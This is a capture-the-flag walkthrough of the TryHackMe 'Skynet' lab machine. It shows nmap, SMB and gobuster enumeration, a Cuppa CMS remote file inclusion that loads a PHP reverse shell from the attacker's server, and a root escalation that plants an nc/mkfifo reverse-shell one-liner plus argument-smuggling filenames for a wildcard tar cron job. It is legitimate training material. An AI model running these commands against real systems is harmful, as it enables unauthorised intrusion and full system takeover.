Skynet - Tryhackme
Recon
Lets kick off the Nmap scan.
1$ nmap -A -T4 -oN skynet.nmap.txt 10.10.0.50
2Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-26 14:28 EDT
3Nmap scan report for 10.10.0.50
4Host is up (0.081s latency).
5Not shown: 994 closed ports
6PORT STATE SERVICE VERSION
722/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
8| ssh-hostkey:
9| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
10| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
11|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
1280/tcp open http Apache httpd 2.4.18 ((Ubuntu))
13|_http-server-header: Apache/2.4.18 (Ubuntu)
14|_http-title: Skynet
15110/tcp open pop3 Dovecot pop3d
16|_pop3-capabilities: CAPA UIDL RESP-CODES AUTH-RESP-CODE SASL PIPELINING TOP
17139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
18143/tcp open imap Dovecot imapd
19|_imap-capabilities: LOGINDISABLEDA0001 post-login have LITERAL+ capabilities listed more IDLE SASL-IR OK ID LOGIN-REFERRALS ENABLE Pre-login IMAP4rev1
20445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
21Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
22
23Host script results:
24|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
25|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
26| smb-os-discovery:
27| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
28| Computer name: skynet
29| NetBIOS computer name: SKYNET\x00
30| Domain name: \x00
31| FQDN: skynet
32|_ System time: 2020-09-26T13:28:29-05:00
33| smb-security-mode:
34| account_used: guest
35| authentication_level: user
36| challenge_response: supported
37|_ message_signing: disabled (dangerous, but default)
38| smb2-security-mode:
39| 2.02:
40|_ Message signing enabled but not required
41| smb2-time:
42| date: 2020-09-26T18:28:29
43|_ start_date: N/A
44
45Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
46Nmap done: 1 IP address (1 host up) scanned in 16.26 seconds
47
Lets enumerate samba and in parallel kick off gobuster
1$ smbclient -L \\\\10.10.0.50
2Enter WORKGROUP\eneloop's password:
3
4 Sharename Type Comment
5 --------- ---- -------
6 print$ Disk Printer Drivers
7 anonymous Disk Skynet Anonymous Share
8 milesdyson Disk Miles Dyson Personal Share
9 IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
10SMB1 disabled -- no workgroup available
1$ smbmap -H 10.10.0.50
2[+] Guest session IP: 10.10.0.50:445 Name: 10.10.0.50
3 Disk Permissions Comment
4 ---- ----------- -------
5 print$ NO ACCESS Printer Drivers
6 anonymous READ ONLY Skynet Anonymous Share
7 milesdyson NO ACCESS Miles Dyson Personal Share
8 IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
9
10
Enumeration
1eneloop@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/skynet/data$ rpcclient -U "" -N 10.10.0.50
2rpcclient $> enumdomusers
3user:[milesdyson] rid:[0x3e8]
4rpcclient $> queryuser 0x3e8
5 User Name : milesdyson
6 Full Name :
7 Home Drive : \\skynet\milesdyson
8 Dir Drive :
9 Profile Path: \\skynet\milesdyson\profile
10 Logon Script:
11 Description :
12 Workstations:
13 Comment :
14 Remote Dial :
15 Logon Time : Wed, 31 Dec 1969 19:00:00 EST
16 Logoff Time : Wed, 06 Feb 2036 10:06:39 EST
17 Kickoff Time : Wed, 06 Feb 2036 10:06:39 EST
18 Password last set Time : Tue, 17 Sep 2019 02:40:55 EDT
19 Password can change Time : Tue, 17 Sep 2019 02:40:55 EDT
20 Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
21 unknown_2[0..31]...
22 user_rid : 0x3e8
23 group_rid: 0x201
24 acb_info : 0x00000010
25 fields_present: 0x00ffffff
26 logon_divs: 168
27 bad_password_count: 0x00000000
28 logon_count: 0x00000000
29 padding1[0..7]...
30 logon_hrs[0..21]...
31rpcclient $>
Connect to the anonymous share and see if we can download any files.
1$ smbclient //10.10.0.50/anonymous
2Enter WORKGROUP\eneloop's password:
3Try "help" to get a list of possible commands.
4smb: \>
5smb: \> ls
6 . D 0 Wed Sep 18 00:41:20 2019
7 .. D 0 Tue Sep 17 03:20:17 2019
8 attention.txt N 163 Tue Sep 17 23:04:59 2019
9 logs D 0 Wed Sep 18 00:42:16 2019
10 books D 0 Wed Sep 18 00:40:06 2019
11
12 9204224 blocks of size 1024. 5359276 blocks available
13smb: \> get attention.txt
14getting file \attention.txt of size 163 as attention.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
15smb: \> cd logs
16smb: \logs\> ls
17 . D 0 Wed Sep 18 00:42:16 2019
18 .. D 0 Wed Sep 18 00:41:20 2019
19 log2.txt N 0 Wed Sep 18 00:42:13 2019
20 log1.txt N 471 Wed Sep 18 00:41:59 2019
21 log3.txt N 0 Wed Sep 18 00:42:16 2019
22
23 9204224 blocks of size 1024. 5358756 blocks available
24smb: \logs\> get log1.txt
25getting file \logs\log1.txt of size 471 as log1.txt (1.4 KiloBytes/sec) (average 1.0 KiloBytes/sec)
26
Gobuster scan came back, and we notice the squirrelmail web client installed. Lets access Miles' emails.
1
2$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://10.10.0.50
3===============================================================
4Gobuster v3.0.1
5by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
6===============================================================
7[+] Url: http://10.10.0.50
8[+] Threads: 10
9[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
10[+] Status codes: 200,204,301,302,307,401,403
11[+] User Agent: gobuster/3.0.1
12[+] Timeout: 10s
13===============================================================
142020/09/26 14:31:56 Starting gobuster
15===============================================================
16/admin (Status: 301)
17/css (Status: 301)
18/js (Status: 301)
19/config (Status: 301)
20/ai (Status: 301)
21/squirrelmail (Status: 301)
22/server-status (Status: 403)
23===============================================================
242020/09/26 15:01:12 Finished
25===============================================================
26
You may enter some rabit holes as I did when you go thorugh all emails.
And you will also see Mile’s samba password in one of the emails.
Exploit
The important.txt file we downloaded from the samba share reveals that Miles was working on a new CMS " Add features to beta CMS /45kra24zxs28v3yd". We should definitely enumerate this path dig more around it.
run gobuster against the CMS path
1$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://10.10.0.50/45kra24zxs28v3yd/
2===============================================================
3Gobuster v3.0.1
4by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
5===============================================================
6[+] Url: http://10.10.0.50/45kra24zxs28v3yd/
7[+] Threads: 10
8[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
9[+] Status codes: 200,204,301,302,307,401,403
10[+] User Agent: gobuster/3.0.1
11[+] Timeout: 10s
12===============================================================
132020/09/26 15:16:54 Starting gobuster
14===============================================================
15/administrator (Status: 301)
16Progress: 18701 / 220561 (8.48%)^C
17[!] Keyboard interrupt detected, terminating.
18===============================================================
192020/09/26 15:19:23 Finished
We have stumbled upon an interesting path here, visit the /administator path in the browser and inspect. I tried passwords found so far, some default passwords without any luck.
1$ searchsploit cuppa
2------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
3 Exploit Title | Path
4------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
5Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
6------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
7Shellcodes: No Results
8
Download pentestmonkey’s reverse-php-shell script , update IP address and listening port and host it using python http server. https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
1$ python3 -m http.server 8999
2Serving HTTP on 0.0.0.0 port 8999 (http://0.0.0.0:8999/) ...
310.10.0.50 - - [26/Sep/2020 15:34:28] "GET /shell.php HTTP/1.0" 200 -
4
Also, do not forget to start a listener using nc to catch the reverse shell
1$ nc -lvnp 9000
Now, make call to the shell using curl or from browser -
$ curl http://10.10.0.50/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.6.19.215:8999/shell.php
You should now have a low level shell as www-data and you should be able to read the user flag.
Download
Post Exploit - Privesc
Download linpeas.sh and execute.
You will notice an intersting script neing run every minute by root. This is definitely somethig we can exploit. */1 * * * * root /home/milesdyson/backups/backup.sh I was stuck here for some time. Then referred to a walk through and came across this awesome way to exploit wildcarded tar commands
https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/
1echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.19.215 10000 >/tmp/f" > shell.sh
2touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
3touch "/var/www/html/--checkpoint=1"
1$ ls -otr
2total 64
3-rw-r--r-- 1 www-data 2667 Sep 17 2019 style.css
4-rw-r--r-- 1 www-data 25015 Sep 17 2019 image.png
5-rw-r--r-- 1 www-data 523 Sep 17 2019 index.html
6drwxr-xr-x 3 www-data 4096 Sep 17 2019 45kra24zxs28v3yd
7drwxr-xr-x 2 www-data 4096 Sep 17 2019 config
8drwxr-xr-x 2 www-data 4096 Sep 17 2019 admin
9drwxr-xr-x 2 www-data 4096 Sep 17 2019 css
10drwxr-xr-x 2 www-data 4096 Sep 17 2019 js
11drwxr-xr-x 3 www-data 4096 Sep 17 2019 ai
12-rwxr-xr-x 1 www-data 80 Sep 26 15:07 shell.sh
13-rw-rw-rw- 1 www-data 0 Sep 26 15:13 --checkpoint-action=exec=sh shell.sh
14-rw-rw-rw- 1 www-data 0 Sep 26 15:13 --checkpoint=1
15$
Start another listener from a separate node so you can catch the incoming shell
1$ nc -lvnp 10000
2listening on [any] 10000 ...
3connect to [10.6.19.215] from (UNKNOWN) [10.10.0.50] 47110
4/bin/sh: 0: can't access tty; job control turned off
You should now see the root shell
Now you have root access, proceed to reading the root flag.